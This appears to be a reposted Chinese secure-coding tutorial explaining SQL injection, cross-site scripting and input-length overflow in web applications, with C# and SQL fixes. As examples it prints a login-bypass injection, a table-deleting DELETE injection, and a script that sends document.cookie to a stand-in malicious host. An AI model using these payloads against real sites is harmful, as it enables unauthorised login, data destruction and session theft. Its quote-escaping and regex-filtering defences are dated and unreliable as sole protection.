權衡安全和功能 編寫安全的Web2.0應用

來源:互聯網
上載者:User
web|web2|安全

  開發人員必須權衡好安全和功能之間的關係,這要看某種攻擊得逞的可能性有多大、這個系統有多重要。

  開發人員可以運用諸多基本原則來增強Web應用程式的安全性。主要有以下三條原則:

  盡量減小許可權

  對訪問資源的賬戶進行配置時,始終要把這些賬戶的許可權限制在需要的最小許可權。

  千萬不要相信使用者的輸入,驗證任何輸入的內容

  這對Web應用程式來說尤為重要。確保應用程式並不依賴用戶端的驗證。在伺服器上應當重複所有的檢查工作,因為要是沒有約束條件,比較容易構建網頁副本,有可能導致破壞性代碼在運行,或者導致引起系統崩潰的拒絕服務(DoS)攻擊。

  有節制地使用錯誤訊息

  雖然在開發程式時,詳細的錯誤訊息很有協助,但它們對惡意使用者來說同樣是寶貴的資訊來源。所以指定函數名這類細節沒有太大的意義。這樣的細節記錄在另一個日誌中比較好。

  下面幾個樣本介紹了沒有經過驗證的使用者輸入如何被壞人利用的具體情況,並且介紹了避免這些問題的建議。

  SQL注入

  如果允許任意的SQL命令執行,就會出現SQL注入(SQL injection)。當SQL語句在代碼裡面動態構建時,通常會出現這種情況。

  以下面用C#編寫的代碼為例,該代碼試圖檢查使用者名稱/密碼組合是否正確:

  string username = txtUsername.Text;

  string password = txtPassword.Text;

  string SQL = "SELECT * FROM tblUsers

  WHERE username = '"+ username +"'

  AND password = '"+ password + "';";

  //執行SQL

  使用者名稱和密碼從伺服器端的兩個文字框擷取,並且SQL語句被建立,然後該語句執行。如果沒有記錄返回,那麼表明使用者輸入的詳細資料不正確,或者沒有經過註冊; 否則使用者可以進入到下一個階段。

  如果使用者在兩個文字框裡面輸入了Joe和mypassword,那麼SQL語句會是:

  SELECT * FROM tblUsers

  WHERE username = 'Joe'

  AND password = 'mypassword';

  這正是開發人員的意圖。不過要是使用者往密碼文字框裡面輸入: ' OR 'a' = 'a,SQL就會是:

  SELECT * FROM tblUsers

  WHERE username = 'Joe'

  AND password = ''

  OR 'a' = 'a';

  現在,密碼不重要了,因為'a'='a'總是正確的。如果用來串連到資料庫的賬戶有權刪除資料而不是僅僅有權讀取資料,就會出現更糟糕的情形。假設使用者往密碼文字框裡面輸入: '; DELETE FROM tblUsers WHERE 'a' = 'a'。這會得出以下的語句:

  SELECT * FROM tblUsers

  WHERE username = 'Joe'

  AND password = '';

  DELETE FROM tblUsers

  WHERE 'a' = 'a';

  現在,整個使用者表就會被清空。

  防止這類問題主要有兩種辦法。一是,可以使用預存程序(stored procedure)來執行使用者驗證步驟。設定參數值時,避免使用單引號等特殊符號,因而不可能為WHERE語句添加額外的斷言(predicate),也不會運行多個SQL語句。譬如說,可以構建像下面這樣的預存程序,接受兩個輸入參數後,返回表明使用者是不是合法使用者的第三個參數:

  CREATE PROCEDURE spCheckUser

  (

  @Username VARCHAR(20),

  @Password VARCHAR(20),

  @IsValid BIT OUTPUT

  )

  AS

  DECLARE @UserCount INT

  SELECT @UserCount = COUNT(*)

  FROM tblUsers

  WHERE Username = @Username

  AND Password = @Password

  IF @UserCount = 1

  SET @IsValid = 1

  ELSE

  SET @IsValid = 0

  現在,初始代碼經改動後可以使用預存程序:

  SqlCommand sqlCommand =

  new SqlCommand("spCheckUser");

  SqlParameter sqlParam =

  new SqlParameter("@Username",

  SqlDbType.VarChar, 20)

  sqlParam.Value = txtUsername.Text;

  sqlParam.Direction =

  ParameterDirection.Input;

  sqlCommand.Parameters.Add(sqlParam);

  sqlParam =

  new SqlParameter("@Password",

  SqlDbType.VarChar, 20)

  sqlParam.Value = txtPassword.Text;

  sqlParam.Direction =

  ParameterDirection.Input;

  sqlCommand.Parameters.Add(sqlParam);

  sqlParam =

  new SqlParameter("@IsValid",

  SqlDbType.Bit, 1)

  sqlParam.Direction =

  ParameterDirection.Output;

  sqlCommand.Parameters.Add(sqlParam);

  //執行命令,並檢索輸出參數值

  輸入和輸出參數使用相互關聯類型來說明。如今區別在於,基本的ADO.NET類會把字串' OR 'a' = 'a當成實際使用者的密碼來處理,而不是當成可執行SQL來處理。

  避免這種安全性漏洞的第二種辦法(也適用於所有的使用者輸入)就是,確保特殊字元或者字串被禁用。對SQL而言,導致問題的那個字元就是單引號,所以如果沒法使用預存程序,那麼就把所有單引號變成雙引號,這可以防止有人構建額外的SQL:

  string username = txtUsername.Text;

  string password = txtPassword.Text;

  username = username.Replace("'","''");

  password = password.Replace("'","''");

  string SQL = "SELECT *

  FROM tblUsers

  WHERE username = '"+ username +"'

  AND password = '"+ password +"';";

  //執行SQL

  現在,構建的SQL成為:

  SELECT *

  FROM tblUsers

  WHERE username = 'Joe'

  AND password = '''

  OR ''a'' = ''a';

  這意味著該使用者沒有被識別。

  跨站指令碼

  跨站指令碼(有時縮寫成XSS)允許來自一個地方的代碼在另一個網站裡面運行。正如在大多數情況下一樣,只要驗證使用者輸入的內容就可以避免這問題。以接受HTML格式的文章的公告牌為例。假定使用者在發布訊息中加入了以下內容:

  Hello everyone

  要是不對指令碼塊進行任何驗證及刪除,這條訊息就會出現,標準的警告資訊也會顯示。假定這個樣本沒有惡意,再考慮下一個樣本:

  var I = new Image();

  i.src =

  "http://www.maliciousSite.com/save.asp"

  + escape(document.cookie);

  現在,該使用者的cookie會被傳送到惡意網站,然後記錄在部落格裡面。這不是原先需要的操作,可能會泄露私人資訊,或者讓不懷好意的人以合法使用者的身份登入到公告牌。可以通過採用Regex來搜尋及清除像< script>及其內容這些元素的辦法來防止這個問題。

  資料溢出

  資料過多可能會帶來問題,這有兩個原因。一是,因為應用程式往往會崩潰,譬如說,如果程式試圖把50個字元寫入到列大小隻有40個字元的資料庫表,就會引起程式崩潰。顯然,良好的錯誤捕獲方法應當可以防止這一問題,但如果使用者輸入的是有效內容,而且來自可信使用者,那麼這個問題往往不會發生。資料過多輕則帶來差勁的使用者體驗,重則導致嚴重消耗伺服器資源,要是問題頻頻發生,還會導致整個服務無法使用。如果輸入內容專門旨在導致錯誤、機器過載,這就叫拒絕服務(DoS)攻擊。

  第二個問題是緩衝器溢出。有時候,輸入的資料會溢出旨在存放它的記憶體區,而成為可執行代碼的一部分。只要對輸入到輸入框中的資料進行精心設計,攻擊者就可以在伺服器上執行任意代碼。

  為了避免該問題,不要依靠用戶端技術,譬如設定文字框的最大長度屬性。這很容易被跳過。有些瀏覽器(包括IE在內)允許javascript URL。如果網頁的文字框有一個標為txtSurname的id,那麼下列代碼拷貝到瀏覽器的地址欄上後,就會改變最大長度屬性:

  javascript:document.getElementById

  ("txtSurname").maxLength = 1000

  防止這個問題的方法仍然是在伺服器上進行檢查,看看輸入內容是否超過所需長度; 必要的話縮減輸入內容。(作者單位系河南省鎮平縣教師進修學校)



相關文章

Beyond APAC's No.1 Cloud

19.6% IaaS Market Share in Asia Pacific - Gartner IT Service report, 2018

Learn more >

Apsara Conference 2019

The Rise of Data Intelligence, September 25th - 27th, Hangzhou, China

Learn more >

Alibaba Cloud Free Trial

Learn and experience the power of Alibaba Cloud with a free trial worth $300-1200 USD

Learn more >

聯繫我們

該頁面正文內容均來源於網絡整理,並不代表阿里雲官方的觀點,該頁面所提到的產品和服務也與阿里云無關,如果該頁面內容對您造成了困擾,歡迎寫郵件給我們,收到郵件我們將在5個工作日內處理。

如果您發現本社區中有涉嫌抄襲的內容,歡迎發送郵件至: info-contact@alibabacloud.com 進行舉報並提供相關證據,工作人員會在 5 個工作天內聯絡您,一經查實,本站將立刻刪除涉嫌侵權內容。